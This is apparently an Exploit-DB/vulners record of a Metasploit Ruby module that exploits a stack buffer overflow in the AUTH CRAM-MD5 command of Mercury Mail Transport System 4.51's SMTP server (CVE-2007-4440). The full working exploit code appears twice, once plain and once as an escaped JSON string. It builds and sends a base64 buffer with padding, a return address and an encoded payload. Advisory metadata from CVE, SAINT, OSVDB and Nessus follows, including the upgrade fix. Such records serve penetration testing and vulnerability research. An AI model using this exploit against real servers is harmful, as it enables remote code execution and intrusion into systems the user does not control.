ID EDB-ID:16821 Type exploitdb Reporter metasploit Modified 2010-06-22T00:00:00
Description
Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow. CVE-2007-4440. Remote exploit for windows platform
##
# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.
By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker
may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2007-4440' ],
[ 'OSVDB', '39669' ],
[ 'BID', '25357' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Privileged' => true,
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20\x25",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 18 2007'))
register_options([ Opt::RPORT(25) ], self.class)
end
def exploit
connect
sock.get_once
sock.put("EHLO\r\n")
sock.get_once
sock.put("AUTH CRAM-MD5\r\n")
sock.get_once
select(nil,nil,nil,0.25)
buffer = rand_text_alpha_upper(204) + [target.ret].pack('V')
buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)
sploit = Rex::Text.encode_base64(buffer)
print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n")
handler
disconnect
end
end
{"hash": "56655b4c9a4736d469c8856ed752f6123843d68af03f898cb6b65547bceea29c", "id": "EDB-ID:16821", "lastseen": "2016-02-02T06:35:13", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/16821/", "description": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow. CVE-2007-4440. Remote exploit for windows platform", "title": "Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow", "sourceData": "##\r\n# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\r\n\t\t\t\tBy sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\r\n\t\t\t\tmay be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9583 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4440' ],\r\n\t\t\t\t\t[ 'OSVDB', '39669' ],\r\n\t\t\t\t\t[ 'BID', '25357' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x25\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Mercury Mail Transport System 4.51',\t{ 'Ret' => 0x258d0d1e } ], # ter32.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 18 2007'))\r\n\r\n\t\tregister_options([ Opt::RPORT(25) ], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsock.get_once\r\n\r\n\t\tsock.put(\"EHLO\\r\\n\")\r\n\r\n\t\tsock.get_once\r\n\r\n\t\tsock.put(\"AUTH CRAM-MD5\\r\\n\")\r\n\r\n\t\tsock.get_once\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\tbuffer = rand_text_alpha_upper(204) + [target.ret].pack('V')\r\n\t\tbuffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)\r\n\r\n\t\tsploit = Rex::Text.encode_base64(buffer)\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\tsock.put(sploit + \"\\r\\n\")\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-4440"], "published": "2010-06-22T00:00:00", "osvdbidlist": ["39669"], "references": [], "reporter": "metasploit", "modified": "2010-06-22T00:00:00", "href": "https://www.exploit-db.com/exploits/16821/"}
{"result": {"cve": [{"id": "CVE-2007-4440", "type": "cve", "title": "CVE-2007-4440", "description": "Stack-based buffer overflow in the MercuryS SMTP server in Mercury Mail Transport System, possibly 4.51 and earlier, allows remote attackers to execute arbitrary code via a long AUTH CRAM-MD5 string. NOTE: this might overlap CVE-2006-5961.", "published": "2007-08-20T20:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4440", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-09-29T14:25:29"}], "saint": [{"id": "SAINT:22E7286F9783F05DBFC7B5B9CDBD5350", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-12-14T16:58:06"}, {"id": "SAINT:491FF49E4743FD3140AD54B41D5EBB5F", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-10-03T15:01:59"}, {"id": "SAINT:132528EF0A0ABE0820C9BC93319E35C0", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-01-10T14:03:43"}], "osvdb": [{"id": "OSVDB:39669", "type": "osvdb", "title": "Mercury Mail Transport System SMTP AUTH CRAM-MD5 Remote Overflow", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.pmail.com/m32_451.htm\nSecurity Tracker: 1018587\n[Secunia Advisory ID:26519](https://secuniaresearch.flexerasoftware.com/advisories/26519/)\nOther Advisory URL: http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065357.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html\nISS X-Force ID: 36117\nISS X-Force ID: 36299\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4294\nFrSIRT Advisory: ADV-2007-2918\n[CVE-2007-4440](https://vulners.com/cve/CVE-2007-4440)\nBugtraq ID: 25357\n", "published": "2007-08-18T15:21:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:39669", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-04-28T13:20:35"}], "exploitdb": [{"id": "EDB-ID:4294", "type": "exploitdb", "title": "Mercury SMTPD Remote Preauth Stack Based Overrun PoC", "description": "Mercury SMTPD Remote Preauth Stack Based Overrun PoC. CVE-2007-4440. Dos exploit for windows platform", "published": "2007-08-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4294/", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-01-31T20:34:57"}], "packetstorm": [{"id": "PACKETSTORM:82990", "type": "packetstorm", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82990/Mercury-Mail-SMTP-AUTH-CRAM-MD5-Buffer-Overflow.html", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-12-05T22:15:53"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMTP/MERCURY_CRAM_MD5", "type": "metasploit", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.", "published": "2007-11-07T18:42:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2007-4440"], "lastseen": "2018-02-24T18:58:20"}], "nessus": [{"id": "MERCURY_SMTP_AUTH_CRAM_MD5_OVERFLOW.NASL", "type": "nessus", "title": "Mercury SMTP Server AUTH CRAM-MD5 Remote Buffer Overflow", "description": "The remote host is running the Mercury Mail Transport System, a free suite of server products for Windows and NetWare associated with Pegasus Mail. \n\nThe version of Mercury Mail installed on the remote host includes an SMTP server that is affected by a buffer overflow flaw. Using a specially crafted 'AUTH CRAM-MD5' request, an unauthenticated, remote attacker can leverage this issue to crash the remote application and even execute arbitrary code remotely, subject to the privileges under which the application runs.", "published": "2007-08-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=25928", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-09-26T17:24:01"}]}}